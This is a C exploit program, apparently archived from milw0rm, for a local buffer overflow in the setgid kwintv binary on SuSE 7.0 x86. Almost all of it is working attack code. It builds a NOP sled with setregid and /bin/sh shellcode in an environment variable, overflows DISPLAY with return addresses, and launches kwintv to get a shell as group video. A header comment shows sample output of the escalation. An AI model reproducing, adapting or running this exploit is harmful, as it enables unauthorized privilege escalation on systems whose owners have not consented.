Kwintv - Local Buffer Overflow

1. /*
2.  * (kwintv) local buffer overflow. (gid=video(33))
3.  *
4.  * Author: Cody Tubbs (loophole of hhp).
5.  * www.hhp-programming.net / pigspigs@yahoo.com
6.  * 12/17/2000
7.  *
8.  * For SuSE 7.0 - x86.
9.  * sgid "video"(33) by default.
10.  *
11.  * bash-2.04$ id
12.  * uid=1000(loophole) gid=501(noc)
13.  * bash-2.04$ ./b 0
14.  * Ret-addr 0xbfffe1fc, offset: 0, allign: 0.
15.  * sh-2.04$ id
16.  * uid=1000(loophole) gid=33(video)
17.  * sh-2.04$
18.  *
19.  */
20.  
21. #include <stdio.h>
22.  
23. #define OFFSET 0
24. #define ALLIGN 0
25. #define NOP    0x90
26. #define DBUF   481 //481+((RET)).
27. #define GID    33
28.  
29. static char shellcode[]=
30.   "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0"
31.   "\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x00\xb1\x00\x31"
32.   "\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
33.   "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
34.   "\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
35.   "\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x69";
36.  
37. long get_sp(void){
38.   __asm__("movl %esp,%eax");
39. }
40.  
41. void workit(char *heh){
42.   fprintf(stderr, "\n(kwintv) local exploit for SuSE 7.0 - x86\n");
43.   fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)\n\n");
44.   fprintf(stderr, "Usage: %s <offset> [allign(0..3)]\n", heh);
45.   fprintf(stderr, "Examp: %s 0\n", heh);
46.   fprintf(stderr, "Examp: %s 0 1\n", heh);
47.   exit(1);
48. }
49.  
50.  
51. main(int argc, char **argv){
52.   char eipeip[DBUF], buffer[4096], heh[DBUF+1];
53.   int i, offset, gid, allign;
54.   long address;
55.  
56.   if(argc<2){
57.     workit(argv[0]);
58.   }
59.  
60.   if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
61.   if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}
62.  
63.   address=get_sp()-offset;
64.  
65.   if(allign>0){for(i=0;i<allign;i++){eipeip[i]=0x69;}}//0x69.HEH.:D
66.   for(i=allign;i<DBUF;i+=4){*(long *)&eipeip[i]=address;}
67.  
68.   gid=GID;
69.   shellcode[10]=gid;
70.   shellcode[22]=gid;
71.   shellcode[24]=gid;
72.  
73.   for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
74.     buffer[i]=NOP;
75.   }
76.  
77.   memcpy(heh, eipeip, strlen(eipeip));
78.   memcpy(heh, "DISPLAY=", 8);
79.   putenv(heh);
80.  
81.   memcpy(buffer+i, shellcode, strlen(shellcode));
82.   memcpy(buffer, "KWINEX=", 7);
83.   putenv(buffer);
84.  
85.   fprintf(stderr, "Ret-addr %#x, offset: %d, allign: %d.\n",address,offset,allign);
86.   execlp("/opt/kde/bin/kwintv", "kwintv", 0);//Change path if needed. :D
87. }
88.  
89.  
90. // milw0rm.com [2000-12-06]
91.